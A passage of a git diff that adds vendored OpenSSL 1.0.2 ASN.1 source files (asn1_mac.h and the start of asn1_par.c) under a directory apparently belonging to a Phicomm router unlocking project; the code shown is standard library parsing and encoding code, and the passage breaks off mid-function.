+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_ASN1_MAC_H
+# define HEADER_ASN1_MAC_H
+
+# include <openssl/asn1.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# ifndef ASN1_MAC_ERR_LIB
+#  define ASN1_MAC_ERR_LIB        ERR_LIB_ASN1
+# endif
+
+# define ASN1_MAC_H_err(f,r,line) \
+        ERR_PUT_error(ASN1_MAC_ERR_LIB,(f),(r),__FILE__,(line))
+
+# define M_ASN1_D2I_vars(a,type,func) \
+        ASN1_const_CTX c; \
+        type ret=NULL; \
+        \
+        c.pp=(const unsigned char **)pp; \
+        c.q= *(const unsigned char **)pp; \
+        c.error=ERR_R_NESTED_ASN1_ERROR; \
+        if ((a == NULL) || ((*a) == NULL)) \
+                { if ((ret=(type)func()) == NULL) \
+                        { c.line=__LINE__; goto err; } } \
+        else    ret=(*a);
+
+# define M_ASN1_D2I_Init() \
+        c.p= *(const unsigned char **)pp; \
+        c.max=(length == 0)?0:(c.p+length);
+
+# define M_ASN1_D2I_Finish_2(a) \
+        if (!asn1_const_Finish(&c)) \
+                { c.line=__LINE__; goto err; } \
+        *(const unsigned char **)pp=c.p; \
+        if (a != NULL) (*a)=ret; \
+        return(ret);
+
+# define M_ASN1_D2I_Finish(a,func,e) \
+        M_ASN1_D2I_Finish_2(a); \
+err:\
+        ASN1_MAC_H_err((e),c.error,c.line); \
+        asn1_add_error(*(const unsigned char **)pp,(int)(c.q- *pp)); \
+        if ((ret != NULL) && ((a == NULL) || (*a != ret))) func(ret); \
+        return(NULL)
+
+# define M_ASN1_D2I_start_sequence() \
+        if (!asn1_GetSequence(&c,&length)) \
+                { c.line=__LINE__; goto err; }
+/* Begin reading ASN1 without a surrounding sequence */
+# define M_ASN1_D2I_begin() \
+        c.slen = length;
+
+/* End reading ASN1 with no check on length */
+# define M_ASN1_D2I_Finish_nolen(a, func, e) \
+        *pp=c.p; \
+        if (a != NULL) (*a)=ret; \
+        return(ret); \
+err:\
+        ASN1_MAC_H_err((e),c.error,c.line); \
+        asn1_add_error(*pp,(int)(c.q- *pp)); \
+        if ((ret != NULL) && ((a == NULL) || (*a != ret))) func(ret); \
+        return(NULL)
+
+# define M_ASN1_D2I_end_sequence() \
+        (((c.inf&1) == 0)?(c.slen <= 0): \
+                (c.eos=ASN1_const_check_infinite_end(&c.p,c.slen)))
+
+/* Don't use this with d2i_ASN1_BOOLEAN() */
+# define M_ASN1_D2I_get(b, func) \
+        c.q=c.p; \
+        if (func(&(b),&c.p,c.slen) == NULL) \
+                {c.line=__LINE__; goto err; } \
+        c.slen-=(c.p-c.q);
+
+/* Don't use this with d2i_ASN1_BOOLEAN() */
+# define M_ASN1_D2I_get_x(type,b,func) \
+        c.q=c.p; \
+        if (((D2I_OF(type))func)(&(b),&c.p,c.slen) == NULL) \
+                {c.line=__LINE__; goto err; } \
+        c.slen-=(c.p-c.q);
+
+/* use this instead () */
+# define M_ASN1_D2I_get_int(b,func) \
+        c.q=c.p; \
+        if (func(&(b),&c.p,c.slen) < 0) \
+                {c.line=__LINE__; goto err; } \
+        c.slen-=(c.p-c.q);
+
+# define M_ASN1_D2I_get_opt(b,func,type) \
+        if ((c.slen != 0) && ((M_ASN1_next & (~V_ASN1_CONSTRUCTED)) \
+                == (V_ASN1_UNIVERSAL|(type)))) \
+                { \
+                M_ASN1_D2I_get(b,func); \
+                }
+
+# define M_ASN1_D2I_get_int_opt(b,func,type) \
+        if ((c.slen != 0) && ((M_ASN1_next & (~V_ASN1_CONSTRUCTED)) \
+                == (V_ASN1_UNIVERSAL|(type)))) \
+                { \
+                M_ASN1_D2I_get_int(b,func); \
+                }
+
+# define M_ASN1_D2I_get_imp(b,func, type) \
+        M_ASN1_next=(_tmp& V_ASN1_CONSTRUCTED)|type; \
+        c.q=c.p; \
+        if (func(&(b),&c.p,c.slen) == NULL) \
+                {c.line=__LINE__; M_ASN1_next_prev = _tmp; goto err; } \
+        c.slen-=(c.p-c.q);\
+        M_ASN1_next_prev=_tmp;
+
+# define M_ASN1_D2I_get_IMP_opt(b,func,tag,type) \
+        if ((c.slen != 0) && ((M_ASN1_next & (~V_ASN1_CONSTRUCTED)) == \
+                (V_ASN1_CONTEXT_SPECIFIC|(tag)))) \
+                { \
+                unsigned char _tmp = M_ASN1_next; \
+                M_ASN1_D2I_get_imp(b,func, type);\
+                }
+
+# define M_ASN1_D2I_get_set(r,func,free_func) \
+                M_ASN1_D2I_get_imp_set(r,func,free_func, \
+                        V_ASN1_SET,V_ASN1_UNIVERSAL);
+
+# define M_ASN1_D2I_get_set_type(type,r,func,free_func) \
+                M_ASN1_D2I_get_imp_set_type(type,r,func,free_func, \
+                        V_ASN1_SET,V_ASN1_UNIVERSAL);
+
+# define M_ASN1_D2I_get_set_opt(r,func,free_func) \
+        if ((c.slen != 0) && (M_ASN1_next == (V_ASN1_UNIVERSAL| \
+                V_ASN1_CONSTRUCTED|V_ASN1_SET)))\
+                { M_ASN1_D2I_get_set(r,func,free_func); }
+
+# define M_ASN1_D2I_get_set_opt_type(type,r,func,free_func) \
+        if ((c.slen != 0) && (M_ASN1_next == (V_ASN1_UNIVERSAL| \
+                V_ASN1_CONSTRUCTED|V_ASN1_SET)))\
+                { M_ASN1_D2I_get_set_type(type,r,func,free_func); }
+
+# define M_ASN1_I2D_len_SET_opt(a,f) \
+        if ((a != NULL) && (sk_num(a) != 0)) \
+                M_ASN1_I2D_len_SET(a,f);
+
+# define M_ASN1_I2D_put_SET_opt(a,f) \
+        if ((a != NULL) && (sk_num(a) != 0)) \
+                M_ASN1_I2D_put_SET(a,f);
+
+# define M_ASN1_I2D_put_SEQUENCE_opt(a,f) \
+        if ((a != NULL) && (sk_num(a) != 0)) \
+                M_ASN1_I2D_put_SEQUENCE(a,f);
+
+# define M_ASN1_I2D_put_SEQUENCE_opt_type(type,a,f) \
+        if ((a != NULL) && (sk_##type##_num(a) != 0)) \
+                M_ASN1_I2D_put_SEQUENCE_type(type,a,f);
+
+# define M_ASN1_D2I_get_IMP_set_opt(b,func,free_func,tag) \
+        if ((c.slen != 0) && \
+                (M_ASN1_next == \
+                (V_ASN1_CONTEXT_SPECIFIC|V_ASN1_CONSTRUCTED|(tag))))\
+                { \
+                M_ASN1_D2I_get_imp_set(b,func,free_func,\
+                        tag,V_ASN1_CONTEXT_SPECIFIC); \
+                }
+
+# define M_ASN1_D2I_get_IMP_set_opt_type(type,b,func,free_func,tag) \
+        if ((c.slen != 0) && \
+                (M_ASN1_next == \
+                (V_ASN1_CONTEXT_SPECIFIC|V_ASN1_CONSTRUCTED|(tag))))\
+                { \
+                M_ASN1_D2I_get_imp_set_type(type,b,func,free_func,\
+                        tag,V_ASN1_CONTEXT_SPECIFIC); \
+                }
+
+# define M_ASN1_D2I_get_seq(r,func,free_func) \
+                M_ASN1_D2I_get_imp_set(r,func,free_func,\
+                        V_ASN1_SEQUENCE,V_ASN1_UNIVERSAL);
+
+# define M_ASN1_D2I_get_seq_type(type,r,func,free_func) \
+                M_ASN1_D2I_get_imp_set_type(type,r,func,free_func,\
+                                            V_ASN1_SEQUENCE,V_ASN1_UNIVERSAL)
+
+# define M_ASN1_D2I_get_seq_opt(r,func,free_func) \
+        if ((c.slen != 0) && (M_ASN1_next == (V_ASN1_UNIVERSAL| \
+                V_ASN1_CONSTRUCTED|V_ASN1_SEQUENCE)))\
+                { M_ASN1_D2I_get_seq(r,func,free_func); }
+
+# define M_ASN1_D2I_get_seq_opt_type(type,r,func,free_func) \
+        if ((c.slen != 0) && (M_ASN1_next == (V_ASN1_UNIVERSAL| \
+                V_ASN1_CONSTRUCTED|V_ASN1_SEQUENCE)))\
+                { M_ASN1_D2I_get_seq_type(type,r,func,free_func); }
+
+# define M_ASN1_D2I_get_IMP_set(r,func,free_func,x) \
+                M_ASN1_D2I_get_imp_set(r,func,free_func,\
+                        x,V_ASN1_CONTEXT_SPECIFIC);
+
+# define M_ASN1_D2I_get_IMP_set_type(type,r,func,free_func,x) \
+                M_ASN1_D2I_get_imp_set_type(type,r,func,free_func,\
+                        x,V_ASN1_CONTEXT_SPECIFIC);
+
+# define M_ASN1_D2I_get_imp_set(r,func,free_func,a,b) \
+        c.q=c.p; \
+        if (d2i_ASN1_SET(&(r),&c.p,c.slen,(char *(*)())func,\
+                (void (*)())free_func,a,b) == NULL) \
+                { c.line=__LINE__; goto err; } \
+        c.slen-=(c.p-c.q);
+
+# define M_ASN1_D2I_get_imp_set_type(type,r,func,free_func,a,b) \
+        c.q=c.p; \
+        if (d2i_ASN1_SET_OF_##type(&(r),&c.p,c.slen,func,\
+                                   free_func,a,b) == NULL) \
+                { c.line=__LINE__; goto err; } \
+        c.slen-=(c.p-c.q);
+
+# define M_ASN1_D2I_get_set_strings(r,func,a,b) \
+        c.q=c.p; \
+        if (d2i_ASN1_STRING_SET(&(r),&c.p,c.slen,a,b) == NULL) \
+                { c.line=__LINE__; goto err; } \
+        c.slen-=(c.p-c.q);
+
+# define M_ASN1_D2I_get_EXP_opt(r,func,tag) \
+        if ((c.slen != 0L) && (M_ASN1_next == \
+                (V_ASN1_CONSTRUCTED|V_ASN1_CONTEXT_SPECIFIC|tag))) \
+                { \
+                int Tinf,Ttag,Tclass; \
+                long Tlen; \
+                \
+                c.q=c.p; \
+                Tinf=ASN1_get_object(&c.p,&Tlen,&Ttag,&Tclass,c.slen); \
+                if (Tinf & 0x80) \
+                        { c.error=ERR_R_BAD_ASN1_OBJECT_HEADER; \
+                        c.line=__LINE__; goto err; } \
+                if (Tinf == (V_ASN1_CONSTRUCTED+1)) \
+                                        Tlen = c.slen - (c.p - c.q) - 2; \
+                if (func(&(r),&c.p,Tlen) == NULL) \
+                        { c.line=__LINE__; goto err; } \
+                if (Tinf == (V_ASN1_CONSTRUCTED+1)) { \
+                        Tlen = c.slen - (c.p - c.q); \
+                        if(!ASN1_const_check_infinite_end(&c.p, Tlen)) \
+                                { c.error=ERR_R_MISSING_ASN1_EOS; \
+                                c.line=__LINE__; goto err; } \
+                }\
+                c.slen-=(c.p-c.q); \
+                }
+
+# define M_ASN1_D2I_get_EXP_set_opt(r,func,free_func,tag,b) \
+        if ((c.slen != 0) && (M_ASN1_next == \
+                (V_ASN1_CONSTRUCTED|V_ASN1_CONTEXT_SPECIFIC|tag))) \
+                { \
+                int Tinf,Ttag,Tclass; \
+                long Tlen; \
+                \
+                c.q=c.p; \
+                Tinf=ASN1_get_object(&c.p,&Tlen,&Ttag,&Tclass,c.slen); \
+                if (Tinf & 0x80) \
+                        { c.error=ERR_R_BAD_ASN1_OBJECT_HEADER; \
+                        c.line=__LINE__; goto err; } \
+                if (Tinf == (V_ASN1_CONSTRUCTED+1)) \
+                                        Tlen = c.slen - (c.p - c.q) - 2; \
+                if (d2i_ASN1_SET(&(r),&c.p,Tlen,(char *(*)())func, \
+                        (void (*)())free_func, \
+                        b,V_ASN1_UNIVERSAL) == NULL) \
+                        { c.line=__LINE__; goto err; } \
+                if (Tinf == (V_ASN1_CONSTRUCTED+1)) { \
+                        Tlen = c.slen - (c.p - c.q); \
+                        if(!ASN1_check_infinite_end(&c.p, Tlen)) \
+                                { c.error=ERR_R_MISSING_ASN1_EOS; \
+                                c.line=__LINE__; goto err; } \
+                }\
+                c.slen-=(c.p-c.q); \
+                }
+
+# define M_ASN1_D2I_get_EXP_set_opt_type(type,r,func,free_func,tag,b) \
+        if ((c.slen != 0) && (M_ASN1_next == \
+                (V_ASN1_CONSTRUCTED|V_ASN1_CONTEXT_SPECIFIC|tag))) \
+                { \
+                int Tinf,Ttag,Tclass; \
+                long Tlen; \
+                \
+                c.q=c.p; \
+                Tinf=ASN1_get_object(&c.p,&Tlen,&Ttag,&Tclass,c.slen); \
+                if (Tinf & 0x80) \
+                        { c.error=ERR_R_BAD_ASN1_OBJECT_HEADER; \
+                        c.line=__LINE__; goto err; } \
+                if (Tinf == (V_ASN1_CONSTRUCTED+1)) \
+                                        Tlen = c.slen - (c.p - c.q) - 2; \
+                if (d2i_ASN1_SET_OF_##type(&(r),&c.p,Tlen,func, \
+                        free_func,b,V_ASN1_UNIVERSAL) == NULL) \
+                        { c.line=__LINE__; goto err; } \
+                if (Tinf == (V_ASN1_CONSTRUCTED+1)) { \
+                        Tlen = c.slen - (c.p - c.q); \
+                        if(!ASN1_check_infinite_end(&c.p, Tlen)) \
+                                { c.error=ERR_R_MISSING_ASN1_EOS; \
+                                c.line=__LINE__; goto err; } \
+                }\
+                c.slen-=(c.p-c.q); \
+                }
+
+/* New macros */
+# define M_ASN1_New_Malloc(ret,type) \
+        if ((ret=(type *)OPENSSL_malloc(sizeof(type))) == NULL) \
+                { c.line=__LINE__; goto err2; }
+
+# define M_ASN1_New(arg,func) \
+        if (((arg)=func()) == NULL) return(NULL)
+
+# define M_ASN1_New_Error(a) \
+/*-     err:    ASN1_MAC_H_err((a),ERR_R_NESTED_ASN1_ERROR,c.line); \
+                return(NULL);*/ \
+        err2:   ASN1_MAC_H_err((a),ERR_R_MALLOC_FAILURE,c.line); \
+                return(NULL)
+
+/*
+ * BIG UGLY WARNING! This is so damn ugly I wanna puke.  Unfortunately, some
+ * macros that use ASN1_const_CTX still insist on writing in the input
+ * stream.  ARGH! ARGH! ARGH! Let's get rid of this macro package. Please? --
+ * Richard Levitte
+ */
+# define M_ASN1_next             (*((unsigned char *)(c.p)))
+# define M_ASN1_next_prev        (*((unsigned char *)(c.q)))
+
+/*************************************************/
+
+# define M_ASN1_I2D_vars(a)      int r=0,ret=0; \
+                                unsigned char *p; \
+                                if (a == NULL) return(0)
+
+/* Length Macros */
+# define M_ASN1_I2D_len(a,f)     ret+=f(a,NULL)
+# define M_ASN1_I2D_len_IMP_opt(a,f)     if (a != NULL) M_ASN1_I2D_len(a,f)
+
+# define M_ASN1_I2D_len_SET(a,f) \
+                ret+=i2d_ASN1_SET(a,NULL,f,V_ASN1_SET,V_ASN1_UNIVERSAL,IS_SET);
+
+# define M_ASN1_I2D_len_SET_type(type,a,f) \
+                ret+=i2d_ASN1_SET_OF_##type(a,NULL,f,V_ASN1_SET, \
+                                            V_ASN1_UNIVERSAL,IS_SET);
+
+# define M_ASN1_I2D_len_SEQUENCE(a,f) \
+                ret+=i2d_ASN1_SET(a,NULL,f,V_ASN1_SEQUENCE,V_ASN1_UNIVERSAL, \
+                                  IS_SEQUENCE);
+
+# define M_ASN1_I2D_len_SEQUENCE_type(type,a,f) \
+                ret+=i2d_ASN1_SET_OF_##type(a,NULL,f,V_ASN1_SEQUENCE, \
+                                            V_ASN1_UNIVERSAL,IS_SEQUENCE)
+
+# define M_ASN1_I2D_len_SEQUENCE_opt(a,f) \
+                if ((a != NULL) && (sk_num(a) != 0)) \
+                        M_ASN1_I2D_len_SEQUENCE(a,f);
+
+# define M_ASN1_I2D_len_SEQUENCE_opt_type(type,a,f) \
+                if ((a != NULL) && (sk_##type##_num(a) != 0)) \
+                        M_ASN1_I2D_len_SEQUENCE_type(type,a,f);
+
+# define M_ASN1_I2D_len_IMP_SET(a,f,x) \
+                ret+=i2d_ASN1_SET(a,NULL,f,x,V_ASN1_CONTEXT_SPECIFIC,IS_SET);
+
+# define M_ASN1_I2D_len_IMP_SET_type(type,a,f,x) \
+                ret+=i2d_ASN1_SET_OF_##type(a,NULL,f,x, \
+                                            V_ASN1_CONTEXT_SPECIFIC,IS_SET);
+
+# define M_ASN1_I2D_len_IMP_SET_opt(a,f,x) \
+                if ((a != NULL) && (sk_num(a) != 0)) \
+                        ret+=i2d_ASN1_SET(a,NULL,f,x,V_ASN1_CONTEXT_SPECIFIC, \
+                                          IS_SET);
+
+# define M_ASN1_I2D_len_IMP_SET_opt_type(type,a,f,x) \
+                if ((a != NULL) && (sk_##type##_num(a) != 0)) \
+                        ret+=i2d_ASN1_SET_OF_##type(a,NULL,f,x, \
+                                               V_ASN1_CONTEXT_SPECIFIC,IS_SET);
+
+# define M_ASN1_I2D_len_IMP_SEQUENCE(a,f,x) \
+                ret+=i2d_ASN1_SET(a,NULL,f,x,V_ASN1_CONTEXT_SPECIFIC, \
+                                  IS_SEQUENCE);
+
+# define M_ASN1_I2D_len_IMP_SEQUENCE_opt(a,f,x) \
+                if ((a != NULL) && (sk_num(a) != 0)) \
+                        ret+=i2d_ASN1_SET(a,NULL,f,x,V_ASN1_CONTEXT_SPECIFIC, \
+                                          IS_SEQUENCE);
+
+# define M_ASN1_I2D_len_IMP_SEQUENCE_opt_type(type,a,f,x) \
+                if ((a != NULL) && (sk_##type##_num(a) != 0)) \
+                        ret+=i2d_ASN1_SET_OF_##type(a,NULL,f,x, \
+                                                    V_ASN1_CONTEXT_SPECIFIC, \
+                                                    IS_SEQUENCE);
+
+# define M_ASN1_I2D_len_EXP_opt(a,f,mtag,v) \
+                if (a != NULL)\
+                        { \
+                        v=f(a,NULL); \
+                        ret+=ASN1_object_size(1,v,mtag); \
+                        }
+
+# define M_ASN1_I2D_len_EXP_SET_opt(a,f,mtag,tag,v) \
+                if ((a != NULL) && (sk_num(a) != 0))\
+                        { \
+                        v=i2d_ASN1_SET(a,NULL,f,tag,V_ASN1_UNIVERSAL,IS_SET); \
+                        ret+=ASN1_object_size(1,v,mtag); \
+                        }
+
+# define M_ASN1_I2D_len_EXP_SEQUENCE_opt(a,f,mtag,tag,v) \
+                if ((a != NULL) && (sk_num(a) != 0))\
+                        { \
+                        v=i2d_ASN1_SET(a,NULL,f,tag,V_ASN1_UNIVERSAL, \
+                                       IS_SEQUENCE); \
+                        ret+=ASN1_object_size(1,v,mtag); \
+                        }
+
+# define M_ASN1_I2D_len_EXP_SEQUENCE_opt_type(type,a,f,mtag,tag,v) \
+                if ((a != NULL) && (sk_##type##_num(a) != 0))\
+                        { \
+                        v=i2d_ASN1_SET_OF_##type(a,NULL,f,tag, \
+                                                 V_ASN1_UNIVERSAL, \
+                                                 IS_SEQUENCE); \
+                        ret+=ASN1_object_size(1,v,mtag); \
+                        }
+
+/* Put Macros */
+# define M_ASN1_I2D_put(a,f)     f(a,&p)
+
+# define M_ASN1_I2D_put_IMP_opt(a,f,t)   \
+                if (a != NULL) \
+                        { \
+                        unsigned char *q=p; \
+                        f(a,&p); \
+                        *q=(V_ASN1_CONTEXT_SPECIFIC|t|(*q&V_ASN1_CONSTRUCTED));\
+                        }
+
+# define M_ASN1_I2D_put_SET(a,f) i2d_ASN1_SET(a,&p,f,V_ASN1_SET,\
+                        V_ASN1_UNIVERSAL,IS_SET)
+# define M_ASN1_I2D_put_SET_type(type,a,f) \
+     i2d_ASN1_SET_OF_##type(a,&p,f,V_ASN1_SET,V_ASN1_UNIVERSAL,IS_SET)
+# define M_ASN1_I2D_put_IMP_SET(a,f,x) i2d_ASN1_SET(a,&p,f,x,\
+                        V_ASN1_CONTEXT_SPECIFIC,IS_SET)
+# define M_ASN1_I2D_put_IMP_SET_type(type,a,f,x) \
+     i2d_ASN1_SET_OF_##type(a,&p,f,x,V_ASN1_CONTEXT_SPECIFIC,IS_SET)
+# define M_ASN1_I2D_put_IMP_SEQUENCE(a,f,x) i2d_ASN1_SET(a,&p,f,x,\
+                        V_ASN1_CONTEXT_SPECIFIC,IS_SEQUENCE)
+
+# define M_ASN1_I2D_put_SEQUENCE(a,f) i2d_ASN1_SET(a,&p,f,V_ASN1_SEQUENCE,\
+                                             V_ASN1_UNIVERSAL,IS_SEQUENCE)
+
+# define M_ASN1_I2D_put_SEQUENCE_type(type,a,f) \
+     i2d_ASN1_SET_OF_##type(a,&p,f,V_ASN1_SEQUENCE,V_ASN1_UNIVERSAL, \
+                            IS_SEQUENCE)
+
+# define M_ASN1_I2D_put_SEQUENCE_opt(a,f) \
+                if ((a != NULL) && (sk_num(a) != 0)) \
+                        M_ASN1_I2D_put_SEQUENCE(a,f);
+
+# define M_ASN1_I2D_put_IMP_SET_opt(a,f,x) \
+                if ((a != NULL) && (sk_num(a) != 0)) \
+                        { i2d_ASN1_SET(a,&p,f,x,V_ASN1_CONTEXT_SPECIFIC, \
+                                       IS_SET); }
+
+# define M_ASN1_I2D_put_IMP_SET_opt_type(type,a,f,x) \
+                if ((a != NULL) && (sk_##type##_num(a) != 0)) \
+                        { i2d_ASN1_SET_OF_##type(a,&p,f,x, \
+                                                 V_ASN1_CONTEXT_SPECIFIC, \
+                                                 IS_SET); }
+
+# define M_ASN1_I2D_put_IMP_SEQUENCE_opt(a,f,x) \
+                if ((a != NULL) && (sk_num(a) != 0)) \
+                        { i2d_ASN1_SET(a,&p,f,x,V_ASN1_CONTEXT_SPECIFIC, \
+                                       IS_SEQUENCE); }
+
+# define M_ASN1_I2D_put_IMP_SEQUENCE_opt_type(type,a,f,x) \
+                if ((a != NULL) && (sk_##type##_num(a) != 0)) \
+                        { i2d_ASN1_SET_OF_##type(a,&p,f,x, \
+                                                 V_ASN1_CONTEXT_SPECIFIC, \
+                                                 IS_SEQUENCE); }
+
+# define M_ASN1_I2D_put_EXP_opt(a,f,tag,v) \
+                if (a != NULL) \
+                        { \
+                        ASN1_put_object(&p,1,v,tag,V_ASN1_CONTEXT_SPECIFIC); \
+                        f(a,&p); \
+                        }
+
+# define M_ASN1_I2D_put_EXP_SET_opt(a,f,mtag,tag,v) \
+                if ((a != NULL) && (sk_num(a) != 0)) \
+                        { \
+                        ASN1_put_object(&p,1,v,mtag,V_ASN1_CONTEXT_SPECIFIC); \
+                        i2d_ASN1_SET(a,&p,f,tag,V_ASN1_UNIVERSAL,IS_SET); \
+                        }
+
+# define M_ASN1_I2D_put_EXP_SEQUENCE_opt(a,f,mtag,tag,v) \
+                if ((a != NULL) && (sk_num(a) != 0)) \
+                        { \
+                        ASN1_put_object(&p,1,v,mtag,V_ASN1_CONTEXT_SPECIFIC); \
+                        i2d_ASN1_SET(a,&p,f,tag,V_ASN1_UNIVERSAL,IS_SEQUENCE); \
+                        }
+
+# define M_ASN1_I2D_put_EXP_SEQUENCE_opt_type(type,a,f,mtag,tag,v) \
+                if ((a != NULL) && (sk_##type##_num(a) != 0)) \
+                        { \
+                        ASN1_put_object(&p,1,v,mtag,V_ASN1_CONTEXT_SPECIFIC); \
+                        i2d_ASN1_SET_OF_##type(a,&p,f,tag,V_ASN1_UNIVERSAL, \
+                                               IS_SEQUENCE); \
+                        }
+
+# define M_ASN1_I2D_seq_total() \
+                r=ASN1_object_size(1,ret,V_ASN1_SEQUENCE); \
+                if (pp == NULL) return(r); \
+                p= *pp; \
+                ASN1_put_object(&p,1,ret,V_ASN1_SEQUENCE,V_ASN1_UNIVERSAL)
+
+# define M_ASN1_I2D_INF_seq_start(tag,ctx) \
+                *(p++)=(V_ASN1_CONSTRUCTED|(tag)|(ctx)); \
+                *(p++)=0x80
+
+# define M_ASN1_I2D_INF_seq_end() *(p++)=0x00; *(p++)=0x00
+
+# define M_ASN1_I2D_finish()     *pp=p; \
+                                return(r);
+
+int asn1_GetSequence(ASN1_const_CTX *c, long *length);
+void asn1_add_error(const unsigned char *address, int offset);
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_par.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_par.c
new file mode 100644
index 0000000..f6cd4b2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_par.c
@@ -0,0 +1,405 @@
+/* crypto/asn1/asn1_par.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/objects.h>
+#include <openssl/asn1.h>
+
+static int asn1_print_info(BIO *bp, int tag, int xclass, int constructed,
+                           int indent);
+static int asn1_parse2(BIO *bp, const unsigned char **pp, long length,
+                       int offset, int depth, int indent, int dump);
+static int asn1_print_info(BIO *bp, int tag, int xclass, int constructed,
+                           int indent)
+{
+    static const char fmt[] = "%-18s";
+    char str[128];
+    const char *p;
+
+    if (constructed & V_ASN1_CONSTRUCTED)
+        p = "cons: ";
+    else
+        p = "prim: ";
+    if (BIO_write(bp, p, 6) < 6)
+        goto err;
+    BIO_indent(bp, indent, 128);
+
+    p = str;
+    if ((xclass & V_ASN1_PRIVATE) == V_ASN1_PRIVATE)
+        BIO_snprintf(str, sizeof str, "priv [ %d ] ", tag);
+    else if ((xclass & V_ASN1_CONTEXT_SPECIFIC) == V_ASN1_CONTEXT_SPECIFIC)
+        BIO_snprintf(str, sizeof str, "cont [ %d ]", tag);
+    else if ((xclass & V_ASN1_APPLICATION) == V_ASN1_APPLICATION)
+        BIO_snprintf(str, sizeof str, "appl [ %d ]", tag);
+    else if (tag > 30)
+        BIO_snprintf(str, sizeof str, "<ASN1 %d>", tag);
+    else
+        p = ASN1_tag2str(tag);
+
+    if (BIO_printf(bp, fmt, p) <= 0)
+        goto err;
+    return (1);
+ err:
+    return (0);
+}
+
+int ASN1_parse(BIO *bp, const unsigned char *pp, long len, int indent)
+{
+    return (asn1_parse2(bp, &pp, len, 0, 0, indent, 0));
+}
+
+int ASN1_parse_dump(BIO *bp, const unsigned char *pp, long len, int indent,
+                    int dump)
+{
+    return (asn1_parse2(bp, &pp, len, 0, 0, indent, dump));
+}
+
+static int asn1_parse2(BIO *bp, const unsigned char **pp, long length,
+                       int offset, int depth, int indent, int dump)
+{
+    const unsigned char *p, *ep, *tot, *op, *opp;
+    long len;
+    int tag, xclass, ret = 0;
+    int nl, hl, j, r;
+    ASN1_OBJECT *o = NULL;
+    ASN1_OCTET_STRING *os = NULL;
+    /* ASN1_BMPSTRING *bmp=NULL; */
+    int dump_indent;
+
+#if 0
+    dump_indent = indent;
+#else
+    dump_indent = 6;            /* Because we know BIO_dump_indent() */
+#endif
+    p = *pp;
+    tot = p + length;
+    op = p - 1;
+    while ((p < tot) && (op < p)) {
+        op = p;
